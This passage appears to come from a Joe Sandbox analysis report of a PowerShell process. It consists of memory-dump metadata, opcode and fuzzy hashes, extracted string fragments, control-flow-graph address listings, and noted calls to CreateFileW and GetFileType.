                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ZL_H$x6q$x6q$x6q$x6q$6q$6q
                    • API String ID: 0-2083232959
                    • Opcode ID: 28865759c364e0a8d96e02c0f4934ca01e7f672644f049b935a1f40e1d847149
                    • Instruction ID: e8d8b6f298db97fd197daeda88c739cbc43e3987729bad90b1df19a44c4b2162
                    • Opcode Fuzzy Hash: 28865759c364e0a8d96e02c0f4934ca01e7f672644f049b935a1f40e1d847149
                    • Instruction Fuzzy Hash: 89426A71B0DA4E4FE799DB6888696B577D1FF59310B0541BEC04AC71E6EE38AC428B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1714042185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ZL_H$x6q$x6q$x6q$6q$6q
                    • API String ID: 0-3026675818
                    • Opcode ID: 2edfaaba32a998081253098978961f9c2d88e03e4cd06bd2cace75946a644257
                    • Instruction ID: 0debf3064844f85a38a4367f1ca20f027e60ee6be799c331a7ce11e842fbde8f
                    • Opcode Fuzzy Hash: 2edfaaba32a998081253098978961f9c2d88e03e4cd06bd2cace75946a644257
                    • Instruction Fuzzy Hash: C3E12971B0DA4A4FEB9DDB7888295B577D1FF99350B0541FED04AC72E6ED289C028740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 207 7ffd9b8bdca0-7ffd9b8bdce1 call 7ffd9b8aed68 211 7ffd9b8bdcf5-7ffd9b8bdd00 207->211 212 7ffd9b8bdce3-7ffd9b8bdcf3 207->212 213 7ffd9b8bdd06-7ffd9b8bdd0a 211->213 214 7ffd9b8be043-7ffd9b8be046 211->214 212->211 215 7ffd9b8bdd0c-7ffd9b8bdd11 213->215 216 7ffd9b8bdd1b-7ffd9b8bdd23 213->216 217 7ffd9b8be048-7ffd9b8be05a call 7ffd9b8aeb38 214->217 218 7ffd9b8be05c-7ffd9b8be060 214->218 215->216 220 7ffd9b8bdd29-7ffd9b8bdd46 216->220 221 7ffd9b8be093-7ffd9b8be0a9 216->221 217->218 223 7ffd9b8be062-7ffd9b8be06f 218->223 226 7ffd9b8bdd4c-7ffd9b8bddc0 call 7ffd9b8aed00 220->226 227 7ffd9b8bdf21-7ffd9b8bdf36 220->227 230 7ffd9b8be0ab-7ffd9b8be0b2 221->230 231 7ffd9b8be0b3-7ffd9b8be0f8 221->231 263 7ffd9b8bdde8 226->263 264 7ffd9b8bddc2-7ffd9b8bddc3 226->264 235 7ffd9b8bdf38-7ffd9b8bdf3e 227->235 236 7ffd9b8bdfb3-7ffd9b8bdfbe 227->236 230->231 244 7ffd9b8be0fa-7ffd9b8be10f 231->244 245 7ffd9b8be112-7ffd9b8be150 231->245 241 7ffd9b8bdf40-7ffd9b8bdf50 235->241 242 7ffd9b8bdf52-7ffd9b8bdf61 call 7ffd9b8aed78 235->242 238 7ffd9b8bdfc0-7ffd9b8bdfc5 236->238 239 7ffd9b8bdfcf-7ffd9b8bdfd6 236->239 238->239 239->221 246 7ffd9b8bdfdc-7ffd9b8bdff6 239->246 241->242 253 7ffd9b8bdf65-7ffd9b8bdf71 242->253 244->245 265 7ffd9b8be156-7ffd9b8be179 245->265 266 7ffd9b8be30a-7ffd9b8be332 245->266 252 7ffd9b8bdff7-7ffd9b8be004 246->252 252->223 259 7ffd9b8be006-7ffd9b8be01c call 7ffd9b8aede8 252->259 253->213 256 7ffd9b8bdf77 253->256 256->214 269 7ffd9b8be01e-7ffd9b8be02d call 7ffd9b8aedd0 259->269 270 7ffd9b8be032-7ffd9b8be041 call 7ffd9b8aed38 259->270 271 7ffd9b8bddea-7ffd9b8bde03 263->271 268 7ffd9b8bddc7-7ffd9b8bddd7 264->268 288 7ffd9b8be2e9-7ffd9b8be304 265->288 289 7ffd9b8be17f-7ffd9b8be19d 265->289 290 7ffd9b8be3a6-7ffd9b8be3b4 266->290 291 7ffd9b8be334-7ffd9b8be387 266->291 272 7ffd9b8bdde6 268->272 273 7ffd9b8bddd9-7ffd9b8bdde0 268->273 269->270 270->214 280 7ffd9b8bde25-7ffd9b8bde28 271->280 281 7ffd9b8bde05-7ffd9b8bde20 call 7ffd9b8aed70 271->281 272->271 273->268 279 7ffd9b8bdde2-7ffd9b8bdde4 273->279 279->272 286 7ffd9b8bde2a-7ffd9b8bde44 280->286 287 7ffd9b8bdea3-7ffd9b8bdeab 280->287 281->280 298 7ffd9b8bde46-7ffd9b8bde62 286->298 299 7ffd9b8bde69-7ffd9b8bde6e 286->299 293 7ffd9b8bdeb9-7ffd9b8bdeca call 7ffd9b8aed60 287->293 294 7ffd9b8bdead-7ffd9b8bdeb7 call 7ffd9b8b7c80 287->294 288->265 288->266 289->288 320 7ffd9b8be1a3-7ffd9b8be1ae 289->320 291->290 332 7ffd9b8be389-7ffd9b8be3a4 291->332 305 7ffd9b8bdecc-7ffd9b8bdee6 293->305 306 7ffd9b8bdefa-7ffd9b8bdf03 call 7ffd9b8aed90 293->306 294->293 309 7ffd9b8bdf10-7ffd9b8bdf1d 294->309 311 7ffd9b8bde70-7ffd9b8bde82 298->311 312 7ffd9b8bde64-7ffd9b8bde67 298->312 299->287 315 7ffd9b8bdf7c-7ffd9b8bdf81 305->315 316 7ffd9b8bdeec-7ffd9b8bdef8 305->316 318 7ffd9b8bdf08-7ffd9b8bdf0c 306->318 309->253 323 7ffd9b8bdf1f-7ffd9b8bdf99 309->323 317 7ffd9b8bde84-7ffd9b8bde9d 311->317 312->317 315->214 316->309 317->287 331 7ffd9b8be070-7ffd9b8be092 317->331 318->309 327 7ffd9b8be1b0-7ffd9b8be1ed 320->327 328 7ffd9b8be1f3-7ffd9b8be20e 320->328 323->252 335 7ffd9b8bdf9b-7ffd9b8bdfae call 7ffd9b8aed58 323->335 327->328 339 7ffd9b8be24b-7ffd9b8be28e 328->339 340 7ffd9b8be210-7ffd9b8be249 328->340 331->221 332->290 335->214 351 7ffd9b8be2e0-7ffd9b8be2e8 call 7ffd9b8be3b5 339->351 352 7ffd9b8be290-7ffd9b8be2b8 339->352 340->339 351->288 359 7ffd9b8be2c6-7ffd9b8be2de 352->359 360 7ffd9b8be2ba-7ffd9b8be2bf 352->360 359->351 359->352 360->359
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1714042185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: _K_H
                    • API String ID: 0-2344692464
                    • Opcode ID: 5d166b0308c70ada0daef82663f83d465d1afc3753ccd79535a4579e1a1e5626
                    • Instruction ID: 7d54cafe2a772af7e99809b25c9861e6afd816883ff9f32dc3d417f26aaee743
                    • Opcode Fuzzy Hash: 5d166b0308c70ada0daef82663f83d465d1afc3753ccd79535a4579e1a1e5626
                    • Instruction Fuzzy Hash: DC42A431B1D91E4FEBA4EB6CD864A6977E1FF9C340F0505B9E44DC32A6DE24E8418B81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1714042185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: bd0b6fdceb279471ec250659c6d0364eb6e6dc2e9945c2646886c7b8eeacbadd
                    • Instruction ID: a6c0a6d70d66a3a70655c41bae75f608e9409decad4c17c8b034ef75c20f8dd8
                    • Opcode Fuzzy Hash: bd0b6fdceb279471ec250659c6d0364eb6e6dc2e9945c2646886c7b8eeacbadd
                    • Instruction Fuzzy Hash: 4D71E771A0DA494FDB58DF6CD85A6A97BE0FF59320F0542BFE04DD32A2DB24A9018781
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 387 7ffd9b8a45da-7ffd9b8ad673 391 7ffd9b8ad675-7ffd9b8ad67a 387->391 392 7ffd9b8ad67d-7ffd9b8ad6dc CreateFileW 387->392 391->392 393 7ffd9b8ad6de 392->393 394 7ffd9b8ad6e4-7ffd9b8ad70c 392->394 393->394
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1714042185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 70a6e182c92b496d68fc852dc464a6e39a20cdd66db62cea893af21cc4adbfc7
                    • Instruction ID: f4e427c6e80c2414a82e948a563d1b98d3f9fc36409eea0e101c92e79d5b4bc4
                    • Opcode Fuzzy Hash: 70a6e182c92b496d68fc852dc464a6e39a20cdd66db62cea893af21cc4adbfc7
                    • Instruction Fuzzy Hash: 7F31A27191CA1C8FDB58EF58D845AF977E0FB69721F10422EE04EE3251DB70A8028BC1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 396 7ffd9b8a45ea-7ffd9b8efcc2 GetFileType 400 7ffd9b8efcca-7ffd9b8efcef 396->400 401 7ffd9b8efcc4 396->401 401->400
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1714042185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID: FileType
                    • String ID:
                    • API String ID: 3081899298-0
                    • Opcode ID: 9b5c70a5677a51f9417965b1ebe56ccf62e1c00a5684c3df1e35fcb8b3204905
                    • Instruction ID: 1e18795d65b83358bee11c003991a0802b2518befa5ea40affb0a9df091602a4
                    • Opcode Fuzzy Hash: 9b5c70a5677a51f9417965b1ebe56ccf62e1c00a5684c3df1e35fcb8b3204905
                    • Instruction Fuzzy Hash: EE21B530A08A0C9FDB5CEB98D845BF977E0FB59321F10422ED049D3651DB71A812CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 403 7ffd9b9715bd-7ffd9b9715bf 404 7ffd9b9715c1-7ffd9b9715da 403->404 405 7ffd9b97161c-7ffd9b97162f 403->405 406 7ffd9b971631 405->406 407 7ffd9b971636-7ffd9b971647 405->407 406->407 408 7ffd9b971633 406->408 409 7ffd9b97164e-7ffd9b971661 407->409 410 7ffd9b971649 407->410 408->407 412 7ffd9b971662-7ffd9b971689 409->412 413 7ffd9b97168c-7ffd9b97170f 409->413 410->409 411 7ffd9b97164b 410->411 411->409 412->413 417 7ffd9b971715-7ffd9b97171f 413->417 418 7ffd9b971926-7ffd9b971984 413->418 419 7ffd9b971721-7ffd9b971739 417->419 420 7ffd9b97173b-7ffd9b971748 417->420 436 7ffd9b9719af-7ffd9b9719bb 418->436 437 7ffd9b971986-7ffd9b9719ad 418->437 419->420 427 7ffd9b97174e-7ffd9b971751 420->427 428 7ffd9b9718bb-7ffd9b9718c5 420->428 427->428 430 7ffd9b971757-7ffd9b97175f 427->430 431 7ffd9b9718c7-7ffd9b9718d7 428->431 432 7ffd9b9718d8-7ffd9b971923 428->432 430->418 435 7ffd9b971765-7ffd9b97176f 430->435 432->418 438 7ffd9b971771-7ffd9b97177f 435->438 439 7ffd9b971789-7ffd9b97178f 435->439 445 7ffd9b9719c6-7ffd9b9719d7 436->445 437->436 438->439 444 7ffd9b971781-7ffd9b971787 438->444 439->428 442 7ffd9b971795-7ffd9b971798 439->442 446 7ffd9b9717e1 442->446 447 7ffd9b97179a-7ffd9b9717ad 442->447 444->439 457 7ffd9b9719e0-7ffd9b9719ef 445->457 458 7ffd9b9719d9 445->458 448 7ffd9b9717e3-7ffd9b9717e5 446->448 447->418 459 7ffd9b9717b3-7ffd9b9717bd 447->459 448->428 450 7ffd9b9717eb-7ffd9b9717ee 448->450 455 7ffd9b9717f0-7ffd9b9717f9 450->455 456 7ffd9b971805-7ffd9b971809 450->456 455->456 456->428 466 7ffd9b97180f-7ffd9b971815 456->466 462 7ffd9b9719f1 457->462 463 7ffd9b9719f8-7ffd9b971a75 457->463 458->457 464 7ffd9b9717bf-7ffd9b9717d4 459->464 465 7ffd9b9717d6-7ffd9b9717df 459->465 462->463 474 7ffd9b971a77-7ffd9b971a87 463->474 475 7ffd9b971ae8-7ffd9b971af2 463->475 464->465 465->448 469 7ffd9b971831-7ffd9b971837 466->469 470 7ffd9b971817-7ffd9b971824 466->470 476 7ffd9b971853-7ffd9b971890 469->476 477 7ffd9b971839-7ffd9b971846 469->477 470->469 480 7ffd9b971826-7ffd9b97182f 470->480 484 7ffd9b971a94-7ffd9b971aaa 474->484 485 7ffd9b971a89-7ffd9b971a92 474->485 481 7ffd9b971af4-7ffd9b971af9 475->481 482 7ffd9b971afc-7ffd9b971b41 475->482 501 7ffd9b971892-7ffd9b9718a7 476->501 502 7ffd9b9718a9-7ffd9b9718ba 476->502 477->476 486 7ffd9b971848-7ffd9b971851 477->486 480->469 489 7ffd9b971afa-7ffd9b971afb 481->489 484->489 497 7ffd9b971aac-7ffd9b971ae5 484->497 485->484 486->476 497->475 501->502
                    Memory Dump Source
                    • Source File: 00000006.00000002.1715257801.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b970000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a71dfd92ab635e43328f2ddab6c3e14d618cef109795422135ba7ea0e9f585af
                    • Instruction ID: b167bf071404e69913a42780aa6461a3ab0b88725cc09f61ba475b2b85d0d72b
                    • Opcode Fuzzy Hash: a71dfd92ab635e43328f2ddab6c3e14d618cef109795422135ba7ea0e9f585af
                    • Instruction Fuzzy Hash: 07125A21B1EB991FE76A977858B55B47BE1EF42214B0A01FBD488C71F3EE189D06C342
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 947 7ffd9b8af4cf-7ffd9b8af544 952 7ffd9b8af598-7ffd9b8af649 947->952 953 7ffd9b8af546-7ffd9b8af597 947->953 969 7ffd9b8af64b-7ffd9b8af697 952->969 970 7ffd9b8af699-7ffd9b8af73e 952->970 953->952 969->970 984 7ffd9b8af740-7ffd9b8af746 970->984 985 7ffd9b8af75d-7ffd9b8af75e 970->985 991 7ffd9b8af748-7ffd9b8af74e 984->991 992 7ffd9b8af764-7ffd9b8af766 984->992 986 7ffd9b8af779-7ffd9b8af77e 985->986 987 7ffd9b8af760-7ffd9b8af766 985->987 988 7ffd9b8af780-7ffd9b8af786 986->988 987->988 994 7ffd9b8af768-7ffd9b8d3e06 987->994 995 7ffd9b8af787-7ffd9b8af78d 988->995 1000 7ffd9b8af76b-7ffd9b8af76e 991->1000 1001 7ffd9b8af750-7ffd9b8af756 991->1001 992->988 992->994 999 7ffd9b8d3e08-7ffd9b8d3e0d 994->999 998 7ffd9b8af78e-7ffd9b8af849 995->998 1036 7ffd9b8af897 998->1036 1037 7ffd9b8af84b-7ffd9b8af87e 998->1037 1002 7ffd9b8d3e47-7ffd9b8d3e51 call 7ffd9b8cda60 999->1002 1003 7ffd9b8d3e0f-7ffd9b8d3e12 999->1003 1000->995 1004 7ffd9b8af770 1000->1004 1010 7ffd9b8af758 1001->1010 1011 7ffd9b8af772-7ffd9b8af776 1001->1011 1017 7ffd9b8d3e53-7ffd9b8d3e5d call 7ffd9b8b37e0 1002->1017 1018 7ffd9b8d3e5f-7ffd9b8d3e93 1002->1018 1007 7ffd9b8d3e14-7ffd9b8d3e17 1003->1007 1008 7ffd9b8d3e1e-7ffd9b8d3e29 call 7ffd9b8d0ba0 1003->1008 1004->1011 1013 7ffd9b8d3e19 1007->1013 1014 7ffd9b8d3e2b-7ffd9b8d3e45 1007->1014 1008->999 1010->985 1011->998 1021 7ffd9b8af778 1011->1021 1020 7ffd9b8d3ea6-7ffd9b8d3ead 1013->1020 1014->999 1017->1018 1028 7ffd9b8d3e9e-7ffd9b8d3ea5 1017->1028 1018->1028 1029 7ffd9b8d3e95-7ffd9b8d3e9d 1018->1029 1021->986 1028->1020 1038 7ffd9b8af899-7ffd9b8af8a9 1036->1038 1039 7ffd9b8af881-7ffd9b8af896 1036->1039 1037->1039 1039->1036
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1714042185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: NL_^$^
                    • API String ID: 0-2447703788
                    • Opcode ID: f7fbde88e94860706b3ce5d01ee4dfdf8a157be462e90e92a6c37c11c32a9c00
                    • Instruction ID: 0c392ecf880812f1aab8dae024fec6782c6f783f02e73d8f68541d9ac13404d5
                    • Opcode Fuzzy Hash: f7fbde88e94860706b3ce5d01ee4dfdf8a157be462e90e92a6c37c11c32a9c00
                    • Instruction Fuzzy Hash: 13D13613B0E9A64AD32A73AD78755FD2B50DF85378B0942FBD18D8B0E7E908644783D2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1714042185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: x6q$eJ_^
                    • API String ID: 0-2360786888
                    • Opcode ID: 382b6ca42002f51d57f0b5f2263fd250ed922179fd76bcbd776259668029af43
                    • Instruction ID: 5f007dc2df727f417354df7d7ace83d1a29f2c3ea082935cce1f32f026a1583a
                    • Opcode Fuzzy Hash: 382b6ca42002f51d57f0b5f2263fd250ed922179fd76bcbd776259668029af43
                    • Instruction Fuzzy Hash: 8FD1E531B1DA4A4BE76CEB68946167573C2FFD8740F45437EE04EC32E6DE29B9028681
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1714042185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: L_^
                    • API String ID: 0-3811526842
                    • Opcode ID: ec859535a5bc4139e371311bc67599b5ba780a29de8823d37d89f8142952efae
                    • Instruction ID: 03f71bc196e5140c76e5157213a1672d9c5fcb6efc9f86b2eeaa1d311bf410a7
                    • Opcode Fuzzy Hash: ec859535a5bc4139e371311bc67599b5ba780a29de8823d37d89f8142952efae
                    • Instruction Fuzzy Hash: E8613A47B0E5B645D31A77FD7C6A4F93B40DF8237A71842B7C28D8A0ABAC09148B92D5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000006.00000002.1714042185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_7ffd9b8a0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f7ca18afae3f8ec96fd59febe90483e7efc27bf546c45bf1eb9a2cbacdf9cbc8
                    • Instruction ID: 0579a01a13c658650e44ce9635526f2e96845c12915cc8fb47ffab22d3de69d7
                    • Opcode Fuzzy Hash: f7ca18afae3f8ec96fd59febe90483e7efc27bf546c45bf1eb9a2cbacdf9cbc8
                    • Instruction Fuzzy Hash: 2391D9A7E1FADA4AE362676968B90943F90EF2766870F01F7C4C45F0F3EC192456C621
                    Uniqueness

                    Uniqueness Score: -1.00%